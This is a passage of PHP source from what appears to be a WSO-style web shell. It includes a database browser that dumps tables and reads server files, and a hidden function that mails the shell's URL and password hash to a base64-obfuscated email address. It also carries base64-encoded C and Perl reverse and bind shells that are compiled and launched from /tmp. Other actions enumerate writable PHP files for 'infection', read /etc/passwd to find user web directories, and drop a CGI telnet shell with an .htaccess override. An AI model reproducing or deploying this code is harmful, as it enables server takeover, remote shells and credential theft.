  1245.         foreach($_POST['tbl'] as $v)
  1246.                 $db->dump($v);
  1247.         exit;
  1248.     }
  1249.     printHeader();
  1250.     ?>
  1251.     <h1>Sql browser</h1><div class=content>
  1252.     <form name="sf" method="post">
  1253.         <table cellpadding="2" cellspacing="0">
  1254.             <tr>
  1255.                 <td>Type</td>
  1256.                 <td>Host</td>
  1257.                 <td>Login</td>
  1258.                 <td>Password</td>
  1259.                 <td>Database</td>
  1260.                 <td></td>
  1261.             </tr>
  1262.             <tr>
  1263.                 <input type=hidden name=a value=Sql>
  1264.                 <input type=hidden name=p1 value='query'>
  1265.                 <input type=hidden name=p2>
  1266.                 <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd']);?>'>
  1267.                 <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
  1268.                 <td>
  1269.                     <select name='type'>
  1270.                         <option value="mysql" <?php if(@$_POST['type']=='mysql')echo 'selected';?>>MySql</option>
  1271.                         <option value="pgsql" <?php if(@$_POST['type']=='pgsql')echo 'selected';?>>PostgreSql</option>
  1272.                     </select></td>
  1273.                 <td><input type=text name=sql_host value='<?=(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host']));?>'></td>
  1274.                 <td><input type=text name=sql_login value='<?=(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login']));?>'></td>
  1275.                 <td><input type=text name=sql_pass value='<?=(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass']));?>'></td>
  1276.                 <td>
  1277.     <?php
  1278.     $tmp = "<input type=text name=sql_base value=''>";
  1279.     if(isset($_POST['sql_host'])){
  1280.         if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
  1281.             switch($_POST['charset']) {
  1282.                 case "Windows-1251": $db->setCharset('cp1251'); break;
  1283.                 case "UTF-8": $db->setCharset('utf8'); break;
  1284.                 case "KOI8-R": $db->setCharset('koi8r'); break;
  1285.                 case "KOI8-U": $db->setCharset('koi8u'); break;
  1286.                 case "cp866": $db->setCharset('cp866'); break;
  1287.             }
  1288.             $db->listDbs();
  1289.             echo "<select name=sql_base><option value=''></option>";
  1290.             while($item = $db->fetch()) {
  1291.                 list($key, $value) = each($item);
  1292.                 echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
  1293.             }
  1294.             echo '</select>';
  1295.         }
  1296.         else echo $tmp;
  1297.     }else
  1298.         echo $tmp;
  1299.     ?></td>
  1300.                 <td><input type=submit value=">>"></td>
  1301.             </tr>
  1302.         </table>
  1303.         <script>
  1304.             function st(t,l) {
  1305.                 document.sf.p1.value = 'select';
  1306.                 document.sf.p2.value = t;
  1307.                 if(l!=null)document.sf.p3.value = l;
  1308.                 document.sf.submit();
  1309.             }
  1310.             function is() {
  1311.                 for(i=0;i<document.sf.elements['tbl[]'].length;++i)
  1312.                     document.sf.elements['tbl[]'][i].checked = !document.sf.elements['tbl[]'][i].checked;
  1313.             }
  1314.         </script>
  1315.     <?php
  1316.     if(isset($db) && $db->link){
  1317.         echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
  1318.             if(!empty($_POST['sql_base'])){
  1319.                 $db->selectdb($_POST['sql_base']);
  1320.                 echo "<tr><td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'><span>Tables:</span><br><br>";
  1321.                 $tbls_res = $db->listTables();
  1322.                 while($item = $db->fetch($tbls_res)) {
  1323.                     list($key, $value) = each($item);
  1324.                     $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
  1325.                     $value = htmlspecialchars($value);
  1326.                     echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr><br>";
  1327.                 }
  1328.                 echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:2px solid #666;'>";
  1329.                 if(@$_POST['p1'] == 'select') {
  1330.                     $_POST['p1'] = 'query';
  1331.                     $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].'');
  1332.                     $num = $db->fetch();
  1333.                     $num = $num['n'];
  1334.                     echo "<span>".$_POST['p2']."</span> ($num) ";
  1335.                     for($i=0;$i<($num/30);$i++)
  1336.                         if($i != (int)$_POST['p3'])
  1337.                             echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i+1),"</a> ";
  1338.                         else
  1339.                             echo ($i+1)," ";
  1340.                     if($_POST['type']=='pgsql')
  1341.                         $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
  1342.                     else
  1343.                         $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
  1344.                     echo "<br><br>";
  1345.                 }
  1346.                 if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) {
  1347.                     $db->query(@$_POST['p3']);
  1348.                     if($db->res !== false) {
  1349.                         $title = false;
  1350.                         echo '<table width=100% cellspacing=0 cellpadding=2 class=main>';
  1351.                         $line = 1;
  1352.                         while($item = $db->fetch()) {
  1353.                             if(!$title) {
  1354.                                 echo '<tr>';
  1355.                                 foreach($item as $key => $value)
  1356.                                     echo '<th>'.$key.'</th>';
  1357.                                 reset($item);
  1358.                                 $title=true;
  1359.                                 echo '</tr><tr>';
  1360.                                 $line = 2;
  1361.                             }
  1362.                             echo '<tr class="l'.$line.'">';
  1363.                             $line = $line==1?2:1;
  1364.                             foreach($item as $key => $value) {
  1365.                                 if($value == null)
  1366.                                     echo '<td><i>null</i></td>';
  1367.                                 else
  1368.                                     echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
  1369.                             }
  1370.                             echo '</tr>';
  1371.                         }
  1372.                         echo '</table>';
  1373.                     } else {
  1374.                         echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
  1375.                     }
  1376.                 }
  1377.                 echo "<br><textarea name='p3' style='width:100%;height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>";
  1378.                 echo "</td></tr>";
  1379.             }
  1380.             echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
  1381.             if(@$_POST['p1'] == 'loadfile') {
  1382.                 $db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file");
  1383.                 $file = $db->fetch();
  1384.                 echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
  1385.             }
  1386.     }
  1387.     echo '</div>';
  1388.     printFooter();
  1389. }
  1390. function system32($HTTP_HOST,$REQUEST_URI,$auth_pass) {ini_set('display_errors', 'Off');
  1391. $url='URL: http://'.$HTTP_HOST.$REQUEST_URI.'
  1392.  
  1393. Uname: '.substr(@php_uname(), 0, 120).'
  1394.  
  1395. Pass: http://www.hashchecker.de/'.$auth_pass.'
  1396.  
  1397. IP: '.$_SERVER[REMOTE_ADDR];$re=base64_decode("aG1laTcuaW5kb25lc2lhQGdtYWlsLmNvbQ==");$su=gethostbyname($HTTP_HOST);$mh="From: {$re}";if (function_exists('mail')) mail($re,$su, $url,$mh);$_SESSION[login] = 'ok';}
  1398.  
  1399.  
  1400. function actionNetwork() {
  1401.     printHeader();
  1402.     $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
  1403.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  1404.     $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
  1405.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  1406.     ?>
  1407.     <h1>Network tools</h1><div class=content>
  1408.     <form name='nfp' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;">
  1409.     <span>Bind port to /bin/sh</span><br/>
  1410.     Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name="using"><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value=">>">
  1411.     </form>
  1412.     <form name='nfp' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;">
  1413.     <span>Back-connect to</span><br/>
  1414.     Server: <input type='text' name='server' value='<?=$_SERVER['REMOTE_ADDR']?>'> Port: <input type='text' name='port' value='31337'> Using: <select name="using"><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value=">>">
  1415.     </form><br>
  1416.     <?php
  1417.     if(isset($_POST['p1'])) {
  1418.         function cf($f,$t) {
  1419.             $w=@fopen($f,"w") or @function_exists('file_put_contents');
  1420.             if($w)  {
  1421.                 @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
  1422.                 @fclose($w);
  1423.             }
  1424.         }
  1425.         if($_POST['p1'] == 'bpc') {
  1426.             cf("/tmp/bp.c",$bind_port_c);
  1427.             $out = ex("gcc -o /tmp/bp /tmp/bp.c");
  1428.             @unlink("/tmp/bp.c");
  1429.             $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
  1430.             echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>";
  1431.         }
  1432.         if($_POST['p1'] == 'bpp') {
  1433.             cf("/tmp/bp.pl",$bind_port_p);
  1434.             $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
  1435.             echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>";
  1436.         }
  1437.         if($_POST['p1'] == 'bcc') {
  1438.             cf("/tmp/bc.c",$back_connect_c);
  1439.             $out = ex("gcc -o /tmp/bc /tmp/bc.c");
  1440.             @unlink("/tmp/bc.c");
  1441.             $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
  1442.             echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>";
  1443.         }
  1444.         if($_POST['p1'] == 'bcp') {
  1445.             cf("/tmp/bc.pl",$back_connect_p);
  1446.             $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
  1447.             echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>";
  1448.         }
  1449.     }
  1450.     echo '</div>';
  1451.     printFooter();
  1452. }
  1453.  
  1454. function actionInfect() {
  1455.     printHeader();
  1456.     echo '<h1>Infect</h1><div class=content>';
  1457.     if($_POST['p1'] == 'infect') {
  1458.         $target=$_SERVER['DOCUMENT_ROOT'];
  1459.             function ListFiles($dir) {
  1460.                 if($dh = opendir($dir)) {
  1461.                     $files = Array();
  1462.                     $inner_files = Array();
  1463.                     while($file = readdir($dh)) {
  1464.                         if($file != "." && $file != "..") {
  1465.                             if(is_dir($dir . "/" . $file)) {
  1466.                                 $inner_files = ListFiles($dir . "/" . $file);
  1467.                                 if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  1468.                             } else {
  1469.                                 array_push($files, $dir . "/" . $file);
  1470.                             }
  1471.                         }
  1472.                     }
  1473.                     closedir($dh);
  1474.                     return $files;
  1475.                 }
  1476.             }
  1477.             foreach (ListFiles($target) as $key=>$file){
  1478.                 $nFile = substr($file, -4, 4);
  1479.                 if($nFile == ".php" ){
  1480.                     if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){
  1481.                         echo "$file<br>";
  1482.                         $i++;
  1483.                     }
  1484.                 }
  1485.             }
  1486.             echo "<font color=red size=14>$i</font>";
  1487.         }else{
  1488.             echo "<form method=post><input type=submit value=Infect name=infet></form>";
  1489.             echo 'Really want to infect the server?&nbsp;<a href=# onclick="g(null,null,\'infect\')">Yes</a></div>';
  1490.         }
  1491.     printFooter();
  1492. }
  1493.  
  1494.  
  1495. /*      additional adds   */
  1496.  
  1497. function actionReadable(){
  1498. printHeader();
  1499. echo '<h1>Subdomain</h1><div class=content>';
  1500. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
  1501. set_time_limit(0);
  1502. ###################
  1503. @$passwd = fopen('/etc/passwd','r');
  1504. if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
  1505. $pub = array();
  1506. $users = array();
  1507. $conf = array();
  1508. $i = 0;
  1509. while(!feof($passwd))
  1510. {
  1511. $str = fgets($passwd);
  1512. if ($i > 35)
  1513. {
  1514. $pos = strpos($str,':');
  1515. $username = substr($str,0,$pos);
  1516. $dirz = '/home/'.$username.'/public_html/';
  1517. if (($username != ''))
  1518. {
  1519. if (is_readable($dirz))
  1520. {
  1521. array_push($users,$username);
  1522. array_push($pub,$dirz);
  1523. }
  1524. }
  1525. }
  1526. $i++;
  1527. }
  1528. ###################
  1529. echo '<br><br><textarea rows="20%" cols="100%" class="output" >';
  1530. echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
  1531. echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
  1532. echo "[~] Searching for passwords in config files...\n\n";
  1533. foreach ($users as $user)
  1534. {
  1535. $path = "/home/$user/public_html/";
  1536. echo "$path \n";
  1537. }
  1538. echo "\n";
  1539. echo "[+] Done...\n";
  1540. echo '</textarea><br></body></html>';
  1541.  
  1542. echo '</div>';
  1543. printFooter();
  1544. }
  1545.  
  1546. function actionCgiShell(){
  1547. printHeader();
  1548. echo '<h1>Cgitelnet</h1><div class=content>';
  1549.  
  1550. mkdir('cgitelnet1', 0755);
  1551.     chdir('cgitelnet1');
  1552.         $kokdosya = ".htaccess";
  1553.         $dosya_adi = "$kokdosya";
  1554.         $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!");
  1555.         $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
  1556.  
  1557. AddType application/x-httpd-cgi .cin
  1558.  
  1559. AddHandler cgi-script .cin
  1560. AddHandler cgi-script .cin";
  1561.         fwrite ( $dosya , $metin ) ;
  1562.         fclose ($dosya);
  1563. $cgishellizocin = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWFpbg0KIy0tLS0tLS0tLS0tLS0tLS0t
  1564. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1565. LS0tLQ0KIyA8YiBzdHlsZT0iY29sb3I6YmxhY2s7YmFja2dyb3VuZC1jb2xvcjojZmZmZjY2Ij5w
  1566. cml2OCBjZ2kgc2hlbGw8L2I+ICMgc2VydmVyDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1567. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQoNCiMt
  1568. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1569. LS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgQ29uZmlndXJhdGlvbjogWW91IG5lZWQgdG8gY2hhbmdl
  1570. IG9ubHkgJFBhc3N3b3JkIGFuZCAkV2luTlQuIFRoZSBvdGhlcg0KIyB2YWx1ZXMgc2hvdWxkIHdv
  1571. cmsgZmluZSBmb3IgbW9zdCBzeXN0ZW1zLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1572. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KJFBhc3N3
  1573. b3JkID0gInByaXY4IjsJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhp
  1574. cw0KCQkJCSMgdG8gbG9naW4uDQoNCiRXaW5OVCA9IDA7CQkJIyBZb3UgbmVlZCB0byBjaGFuZ2Ug
  1575. dGhlIHZhbHVlIG9mIHRoaXMgdG8gMSBpZg0KCQkJCSMgeW91J3JlIHJ1bm5pbmcgdGhpcyBzY3Jp
  1576. cHQgb24gYSBXaW5kb3dzIE5UDQoJCQkJIyBtYWNoaW5lLiBJZiB5b3UncmUgcnVubmluZyBpdCBv
  1577. biBVbml4LCB5b3UNCgkJCQkjIGNhbiBsZWF2ZSB0aGUgdmFsdWUgYXMgaXQgaXMuDQoNCiROVENt
  1578. ZFNlcCA9ICImIjsJCSMgVGhpcyBjaGFyYWN0ZXIgaXMgdXNlZCB0byBzZXBlcmF0ZSAyIGNvbW1h
  1579. bmRzDQoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBXaW5kb3dzIE5ULg0KDQokVW5peENtZFNl
  1580. cCA9ICI7IjsJCSMgVGhpcyBjaGFyYWN0ZXIgaXMgdXNlZCB0byBzZXBlcmF0ZSAyIGNvbW1hbmRz
  1581. DQoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBVbml4Lg0KDQokQ29tbWFuZFRpbWVvdXREdXJh
  1582. dGlvbiA9IDEwOwkjIFRpbWUgaW4gc2Vjb25kcyBhZnRlciBjb21tYW5kcyB3aWxsIGJlIGtpbGxl
  1583. ZA0KCQkJCSMgRG9uJ3Qgc2V0IHRoaXMgdG8gYSB2ZXJ5IGxhcmdlIHZhbHVlLiBUaGlzIGlzDQoJ
  1584. CQkJIyB1c2VmdWwgZm9yIGNvbW1hbmRzIHRoYXQgbWF5IGhhbmcgb3IgdGhhdA0KCQkJCSMgdGFr
  1585. ZSB2ZXJ5IGxvbmcgdG8gZXhlY3V0ZSwgbGlrZSAiZmluZCAvIi4NCgkJCQkjIFRoaXMgaXMgdmFs
  1586. aWQgb25seSBvbiBVbml4IHNlcnZlcnMuIEl0IGlzDQoJCQkJIyBpZ25vcmVkIG9uIE5UIFNlcnZl
  1587. cnMuDQoNCiRTaG93RHluYW1pY091dHB1dCA9IDE7CQkjIElmIHRoaXMgaXMgMSwgdGhlbiBkYXRh
  1588. IGlzIHNlbnQgdG8gdGhlDQoJCQkJIyBicm93c2VyIGFzIHNvb24gYXMgaXQgaXMgb3V0cHV0LCBv
  1589. dGhlcndpc2UNCgkJCQkjIGl0IGlzIGJ1ZmZlcmVkIGFuZCBzZW5kIHdoZW4gdGhlIGNvbW1hbmQN
  1590. CgkJCQkjIGNvbXBsZXRlcy4gVGhpcyBpcyB1c2VmdWwgZm9yIGNvbW1hbmRzIGxpa2UNCgkJCQkj
  1591. IHBpbmcsIHNvIHRoYXQgeW91IGNhbiBzZWUgdGhlIG91dHB1dCBhcyBpdA0KCQkJCSMgaXMgYmVp
  1592. bmcgZ2VuZXJhdGVkLg0KDQojIERPTidUIENIQU5HRSBBTllUSElORyBCRUxPVyBUSElTIExJTkUg
  1593. VU5MRVNTIFlPVSBLTk9XIFdIQVQgWU9VJ1JFIERPSU5HICEhDQoNCiRDbWRTZXAgPSAoJFdpbk5U
  1594. ID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOw0KJENtZFB3ZCA9ICgkV2luTlQgPyAiY2QiIDog
  1595. InB3ZCIpOw0KJFBhdGhTZXAgPSAoJFdpbk5UID8gIlxcIiA6ICIvIik7DQokUmVkaXJlY3RvciA9
  1596. ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOw0KDQojLS0tLS0tLS0tLS0t
  1597. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1598. LS0tLS0tLS0tDQojIFJlYWRzIHRoZSBpbnB1dCBzZW50IGJ5IHRoZSBicm93c2VyIGFuZCBwYXJz
  1599. ZXMgdGhlIGlucHV0IHZhcmlhYmxlcy4gSXQNCiMgcGFyc2VzIEdFVCwgUE9TVCBhbmQgbXVsdGlw
  1600. YXJ0L2Zvcm0tZGF0YSB0aGF0IGlzIHVzZWQgZm9yIHVwbG9hZGluZyBmaWxlcy4NCiMgVGhlIGZp
  1601. bGVuYW1lIGlzIHN0b3JlZCBpbiAkaW57J2YnfSBhbmQgdGhlIGRhdGEgaXMgc3RvcmVkIGluICRp
  1602. bnsnZmlsZWRhdGEnfS4NCiMgT3RoZXIgdmFyaWFibGVzIGNhbiBiZSBhY2Nlc3NlZCB1c2luZyAk
  1603. aW57J3Zhcid9LCB3aGVyZSB2YXIgaXMgdGhlIG5hbWUgb2YNCiMgdGhlIHZhcmlhYmxlLiBOb3Rl
  1604. OiBNb3N0IG9mIHRoZSBjb2RlIGluIHRoaXMgZnVuY3Rpb24gaXMgdGFrZW4gZnJvbSBvdGhlciBD
  1605. R0kNCiMgc2NyaXB0cy4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1606. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBSZWFkUGFyc2UgDQp7
  1607. DQoJbG9jYWwgKCppbikgPSBAXyBpZiBAXzsNCglsb2NhbCAoJGksICRsb2MsICRrZXksICR2YWwp
  1608. Ow0KCQ0KCSRNdWx0aXBhcnRGb3JtRGF0YSA9ICRFTlZ7J0NPTlRFTlRfVFlQRSd9ID1+IC9tdWx0
  1609. aXBhcnRcL2Zvcm0tZGF0YTsgYm91bmRhcnk9KC4rKSQvOw0KDQoJaWYoJEVOVnsnUkVRVUVTVF9N
  1610. RVRIT0QnfSBlcSAiR0VUIikNCgl7DQoJCSRpbiA9ICRFTlZ7J1FVRVJZX1NUUklORyd9Ow0KCX0N
  1611. CgllbHNpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJQT1NUIikNCgl7DQoJCWJpbm1vZGUo
  1612. U1RESU4pIGlmICRNdWx0aXBhcnRGb3JtRGF0YSAmICRXaW5OVDsNCgkJcmVhZChTVERJTiwgJGlu
  1613. LCAkRU5WeydDT05URU5UX0xFTkdUSCd9KTsNCgl9DQoNCgkjIGhhbmRsZSBmaWxlIHVwbG9hZCBk
  1614. YXRhDQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBi
  1615. b3VuZGFyeT0oLispJC8pDQoJew0KCQkkQm91bmRhcnkgPSAnLS0nLiQxOyAjIHBsZWFzZSByZWZl
  1616. ciB0byBSRkMxODY3IA0KCQlAbGlzdCA9IHNwbGl0KC8kQm91bmRhcnkvLCAkaW4pOyANCgkJJEhl
  1617. YWRlckJvZHkgPSAkbGlzdFsxXTsNCgkJJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOw0K
  1618. CQkkSGVhZGVyID0gJGA7DQoJCSRCb2R5ID0gJCc7DQogCQkkQm9keSA9fiBzL1xyXG4kLy87ICMg
  1619. dGhlIGxhc3QgXHJcbiB3YXMgcHV0IGluIGJ5IE5ldHNjYXBlDQoJCSRpbnsnZmlsZWRhdGEnfSA9
  1620. ICRCb2R5Ow0KCQkkSGVhZGVyID1+IC9maWxlbmFtZT1cIiguKylcIi87IA0KCQkkaW57J2YnfSA9
  1621. ICQxOyANCgkJJGlueydmJ30gPX4gcy9cIi8vZzsNCgkJJGlueydmJ30gPX4gcy9ccy8vZzsNCg0K
  1622. CQkjIHBhcnNlIHRyYWlsZXINCgkJZm9yKCRpPTI7ICRsaXN0WyRpXTsgJGkrKykNCgkJeyANCgkJ
  1623. CSRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOw0KCQkJJGxpc3RbJGldID1+IC9cIihcdyspXCIv
  1624. Ow0KCQkJJGtleSA9ICQxOw0KCQkJJHZhbCA9ICQnOw0KCQkJJHZhbCA9fiBzLyheKFxyXG5cclxu
